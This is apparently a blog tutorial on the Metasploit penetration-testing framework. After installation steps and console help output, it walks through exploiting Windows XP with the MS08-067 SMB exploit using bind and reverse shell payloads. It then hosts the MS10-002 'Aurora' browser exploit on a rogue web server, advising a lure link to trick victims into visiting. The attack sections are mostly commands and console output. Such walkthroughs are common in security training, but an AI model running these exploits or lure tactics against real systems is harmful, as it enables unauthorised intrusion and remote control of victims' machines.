Table of Contents
Metasploit is a widely used penetration testing tool that makes hacking way easier than it used to be. It has become an indispensable tool for both the red team and the blue team.
In this article, you are going to learn, how to use Metasploit, a penetration-testing platform for developing and launching exploits.
Metasploit gives you an awesome working environment. From web vulnerability plugins to network information gathering and from an extensive exploit development environment to commercial-grade exploits, you will hardly find any tool parallel to Metasploit.
Getting Metasploitable
Metasploit in Linux
Metasploit Framework comes preinstalled in Kali Linux.To launch Metasploit on Kali Linux Machine, navigate to Application Menu > Exploitation Tools > Metasploit-Framework.
> Executing “sudo msfdb init && msfconsole”
[sudo] password for mrdev:
[+] Starting database
[i] The database appears to be already configured, skipping initialization
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v6.0.30-dev ]
+ -- --=[ 2099 exploits - 1129 auxiliary - 357 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Enable verbose logging with set VERBOSE
true
msf6 >
Installing Metasploit on Windows
Metasploit Framework can be easily installed on a Windows-based operating system.
However, Windows is usually not the platform of choice for deploying Metasploit Framework, the reason being, that many of the supporting tools and utilities are not available for the Windows platform. Hence it's strongly recommended to install the Metasploit Framework on the Linux platform.
The following are the steps for the Metasploit Framework installation on Windows:
1. Download the latest Metasploit from Windows installer from GitHub.
2. Now click and the downloaded file:
3. Accept the license agreement:
4. Select the location where you wish to install the Metasploit Framework:
5. Click on Install to proceed further. The Metasploit installer progresses by copying the required files to the destination folder:
6. Click on Finish to complete the Metasploit
Framework installation. Now that the installation is complete:
Let’s try to access
the Metasploit Framework through the command line interface:
1. Navigate to
C:\metasploit-framework\bin.
Microsoft Windows[Version 6.3.9600]
(c) 2013 Microsoft Corporation. All right reserved.
C:\metasploit-framework\bat> msfconsole.bat
I always prefer you, not to install Metasploit on windows because it takes a huge amount of memory.
Using the Metasploit Console to Launch Exploits
Why Windows XP?
As per my knowledge, Windows XP contains lots of vulnerabilities which means we will perform many attacks compared to today's Windows operating system.1. To launch, Metasploitable type the following commands:
mrdev@kali:~$ msfconsole
Show <exploits | payloads>
Info <exploits | payloads> <name>
Use <exploits-name>
2. You’ll find all the other commands by typing “help” or “?”.
msf6 > help
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
debug Display information useful for debugging
exit Exit the console
features Display the list of not yet released features that can be opted in to
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
load Load a framework plugin
quit Exit the console
repeat Repeat a list of commands
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
tips Show a list of useful productivity tips
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
Module Commands
===============
Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
clearm Clear the module stack
info Displays information about one or more modules
listm List the module stack
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Interact with a module by name or search term/index
Job Commands
============
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job
Resource Script Commands
========================
Command Description
------- -----------
makerc Save commands entered since start to a file
resource Run the commands stored in a file
Database Backend Commands
=========================
Command Description
------- -----------
analyze Analyze database information about a specific address or address range
db_connect Connect to an existing data service
db_disconnect Disconnect from the current data service
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache (deprecated)
db_remove Remove the saved data service entry
db_save Save the current data service connection as the default to reconnect on startup
db_status Show the current data service status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Credentials Backend Commands
============================
Command Description
------- -----------
creds List all credentials in the database
Developer Commands
==================
Command Description
------- -----------
edit Edit the current module or a file with the preferred editor
irb Open an interactive Ruby shell in the current context
log Display framework.log paged to the end if possible
pry Open the Pry debugger on the current module or Framework
reload_lib Reload Ruby library files from specified paths
msfconsole
==========
`msfconsole` is the primary interface to Metasploit Framework. There is quite a
lot that needs go here, please be patient and keep an eye on this space!
Building ranges and lists
-------------------------
Many commands and options that take a list of things can use ranges to avoid
having to manually list each desired thing. All ranges are inclusive.
### Ranges of IDs
Commands that take a list of IDs can use ranges to help. Individual IDs must be
separated by a `,` (no space allowed) and ranges can be expressed with either
`-` or `..`.
### Ranges of IPs
There are several ways to specify ranges of IP addresses that can be mixed
together. The first way is a list of IPs separated by just a ` ` (ASCII space),
with an optional `,`. The next way is two complete IP addresses in the form of
`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
specifications may also be used, however the whole address must be given to
Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
Additionally, a netmask can be used in conjunction with a domain name to
dynamically resolve which block to target. All these methods work for both IPv4
and IPv6 addresses. IPv4 addresses can also be specified with special octet
ranges from the [NMAP target
specification](https://nmap.org/book/man-target-specification.html)
### Examples
Terminate the first sessions:
sessions -k 1
Stop some extra running jobs:
jobs -k 2-6,7,8,11..15
Check a set of IP addresses:
check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255
Target a set of IPv6 hosts:
set RHOSTS fe80::3990:0000/110, ::1-::f0f0
Target a block from a resolved domain name:
set RHOSTS www.example.test/24
msf6 >
3. To lunch an MS08-067 exploit, we’ll first need to find The Metasploit name for this exploit. We can use the search command to do so.
msf6
> search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 > use exploit/windows/smb/ms08-067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6
exploit(
windows/smb/ms08_067_netapi
) >
Notice that the prompt changes to enter “exploit mode” when you use an exploit module. Any options or variables you set while configuring this exploit will be retained so that you don’t have to reset the options every time you run it. You can get back to the original lunch state at the main console by issuing the back command.
5. Different exploits have different options. Let’s see what options need to be set to make the MS08-067 exploit work:
msf6
exploit(
windows/smb/ms08-067_netapi
) > back
msf6 > use exploit/windows/smb/ms08-067_netapi
msf6
exploit(
windows/smb/ms08-067_netapi
) > show options
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.43.71 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf6
exploit(
windows/smb/ms08_067_netapi
) >
6. This exploit requires a target address, the port number on which SMB (Server Message Block) listens, and the name of the pipe exposing this functionality:
set RHOSTS <the target IP address>
msf5
exploit(
windows/smb/ms08-067_netapi
) > set RHOSTS 192.168.43.240
Set <OPTION-NAME> <option>
Note: Earlier versions of Metasploit were particular about the case of the option name and option, so examples in this chapter always use uppercase if the option is listed in uppercase.
7. With the exploit module set, we next need to set the payload. The payload is the action that happens after the vulnerability is exploited. It’s like choosing how you want to interact with the compromised machine if the vulnerability is triggered successfully.
For this first example, let’s use a payload that simply opens a command shell listing on a TCP port:
msf6
exploit(
windows/smb/ms08-067_netapi
) > set RHOSTS 192.168.43.240
RHOSTS => 192.168.43.240
msf6
exploit(
windows/smb/ms08-067_netapi
) > show payloads
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 generic/custom normal No Custom Payload
1 generic/debug_trap normal No Generic x86 Debug Trap
2 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 generic/tight_loop normal No Generic x86 Tight Loop
5 windows/adduser normal No Windows Execute net user /ADD
6 windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
7 windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager
8 windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
9 windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
10 windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
11 windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
12 windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86)
13 windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
14 windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
15 windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6)
16 windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
17 windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
18 windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager
19 windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager
20 windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS)
21 windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support
22 windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution
23 windows/exec normal No Windows Execute Command
24 windows/format_all_drives manual No Windows Drive Formatter
25 windows/loadlibrary normal No Windows LoadLibrary Path
26 windows/messagebox normal No Windows MessageBox
27 windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
28 windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
29 windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
30 windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
31 windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
32 windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
33 windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
34 windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
35 windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
36 windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
37 windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
38 windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
39 windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
40 windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
41 windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager
42 windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
43 windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
44 windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
45 windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP
46 windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline
47 windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager
48 windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager
49 windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
50 windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
51 windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager
52 windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7)
53 windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86)
54 windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
55 windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6)
56 windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
57 windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
58 windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager
59 windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager
60 windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS)
61 windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support
62 windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
63 windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
64 windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
65 windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
66 windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
67 windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
68 windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
69 windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
70 windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
71 windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
72 windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
73 windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
74 windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
75 windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
76 windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
77 windows/peinject/bind_hidden_ipknock_tcp normal No Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
78 windows/peinject/bind_hidden_tcp normal No Windows Inject PE Files, Hidden Bind TCP Stager
79 windows/peinject/bind_ipv6_tcp normal No Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
80 windows/peinject/bind_ipv6_tcp_uuid normal No Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
81 windows/peinject/bind_named_pipe normal No Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
82 windows/peinject/bind_nonx_tcp normal No Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
83 windows/peinject/bind_tcp normal No Windows Inject PE Files, Bind TCP Stager (Windows x86)
84 windows/peinject/bind_tcp_uuid normal No Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
85 windows/peinject/reverse_ipv6_tcp normal No Windows Inject PE Files, Reverse TCP Stager (IPv6)
86 windows/peinject/reverse_named_pipe normal No Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
87 windows/peinject/reverse_nonx_tcp normal No Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
88 windows/peinject/reverse_ord_tcp normal No Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
89 windows/peinject/reverse_tcp normal No Windows Inject PE Files, Reverse TCP Stager
90 windows/peinject/reverse_tcp_allports normal No Windows Inject PE Files, Reverse All-Port TCP Stager
91 windows/peinject/reverse_tcp_dns normal No Windows Inject PE Files, Reverse TCP Stager (DNS)
92 windows/peinject/reverse_tcp_uuid normal No Windows Inject PE Files, Reverse TCP Stager with UUID Support
93 windows/pingback_bind_tcp normal No Windows x86 Pingback, Bind TCP Inline
94 windows/pingback_reverse_tcp normal No Windows x86 Pingback, Reverse TCP Inline
95 windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager
96 windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager
97 windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
98 windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
99 windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager
100 windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7)
101 windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86)
102 windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
103 windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6)
104 windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7)
105 windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
106 windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager
107 windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager
108 windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS)
109 windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support
110 windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support
111 windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline
112 windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline
113 windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline
114 windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!"
115 windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
116 windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager
117 windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
118 windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
119 windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
120 windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
121 windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86)
122 windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
123 windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6)
124 windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
125 windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
126 windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager
127 windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager
128 windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS)
129 windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support
130 windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support
131 windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
132 windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager
133 windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
134 windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
135 windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
136 windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
137 windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
138 windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
139 windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
140 windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
141 windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
142 windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
143 windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager
144 windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager
145 windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
146 windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
msf6 exploit(windows/smb/ms08_067_netapi) >
msf5
exploit(
windows/smb/ms08-067_netapi
) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf5
exploit(
windows/smb/ms08-067_netapi
) > show options
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.43.240 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.43.71 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf6
exploit(
windows/smb/ms08_067_netapi
) >
By default, this exploit will open a listener on the TCP port 4444, allowing us to connect for the command shell. Let’s attempt the exploit:
msf6
exploit(
windows/smb/ms08-067_netapi
) > exploit
C:\WINDOWS\system32>netstat
C:\WINDOWS\system32>^z
Background session 1? [y/N] y
msf6
exploit(
windows/smb/ms08-067_netapi
) >
msf6
exploit(
windows/smb/ms08-067_netapi
) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf6
exploit(
windows/smb/ms08-067_netapi
) > show options
Notice that this is “session 2.” Press CTRL – Z to put this session in the background and go back Metasploit prompt. Then, issue the command sessions to list all active sessions:
13. It’s easy to bounce back and forth between these two sessions. Just use the sessions –i <session>. If you don’t get a prompt immediately, try pressing ENTER.
msf6
exploit(
windows/smb/ms08-067_netapi
) > sessions
msf5
exploit(
windows/smb/ms08-067_netapi
) > sessions -i 1
Exploiting Client-Side Vulnerabilities with Metasploit
A Windows XP workstation missing MS08-067 security update and available on the local subnet with no firewall protection is not common. The main purpose of this article is to preview, Client-Side vulnerabilities.
Have you ever seen this type of mail? If yes, then at the end of this article, you will find out how you can hack just through your browser.
Client-side vulnerabilities are vulnerabilities in client software such as web browsers, e-mail applications, and media players.
The idea is to lure a victim to a malicious website or to trick him into opening a malicious file or e-mail. When the victim interacts with attacker-controlled content, the attacker presents data that triggers a vulnerability in the client-side application parsing the content. One nice thing (from an attacker’s point of view) is that connections are initiated by the victim and sail right through the firewall.
The idea is to lure a victim to a malicious website or to trick him into opening a malicious file or e-mail. When the victim interacts with attacker-controlled content, the attacker presents data that triggers a vulnerability in the client-side application parsing the content. One nice thing (from an attacker’s point of view) is that connections are initiated by the victim and sail right through the firewall.
Metasploit includes many exploits for browser-based vulnerabilities and can act as a rogue webserver to host those vulnerabilities. In this video, we’ll use Metasploit to host an exploit for MS10_002.To know more about this read it from Microsoft's official website.
Exploit Windows XP using MS10_002
1. Run Metasploit-Framework:
mrdev@kali:~$ msfconsole
2. To launch an MS10-002 exploit, we’ll first need to find the Metasploit name for this exploit. We can use the search command to do so:
msf6
> search ms10-002
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/browser/ms10_002_aurora 2010-01-14 normal No MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
1 exploit/windows/browser/ms10_002_ie_object 2010-01-21 normal No MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/browser/ms10_002_ie_object
msf6
>
3. The Metasploit name for this exploit is, exploit/windows/browser/ms10_002_aurora, copy it, and use it.
msf6 > use exploit/windows/browser/ms10_002_aurora
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) >
4. Every exploit and Payload have different options. To check options run the following:
msf6
exploit(
windows/browser/ms10-002_aurora
) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.43.71 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6
exploit(
windows/browser/ms10_002_aurora
) >
Metasploit’s browser-based vulnerabilities have additional required options:
SRVHOST: Server IP addressSRVPORT: Server Port Address
5. Now run the following command to set the server host:
msf6
exploit(
windows/browser/ms10-002_aurora
) > set SRVHOST 192.168.43.175
SRVHOST => 192.168.43.175
msf5
exploit(
windows/browser/ms10-002_aurora
) >
mrdev@kali:~$ ifconfig
msf6
exploit(
windows/browser/ms10-002_aurora
) > set URIPATH you_win.htm
URIPATH => you_win.htm
msf6
exploit(
windows/browser/ms10-002_aurora
) >
A good link for that kind of attack might be http://<IP ADDRESS>/you_win.htm . In that case, you would want to set the URIPATH to you_win.htm. For this example, we will leave the URIPATH set to the default, “/”.7. Now run exploit:
msf5
exploit(
windows/browser/ms10-002_aurora
) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.43.71:4444
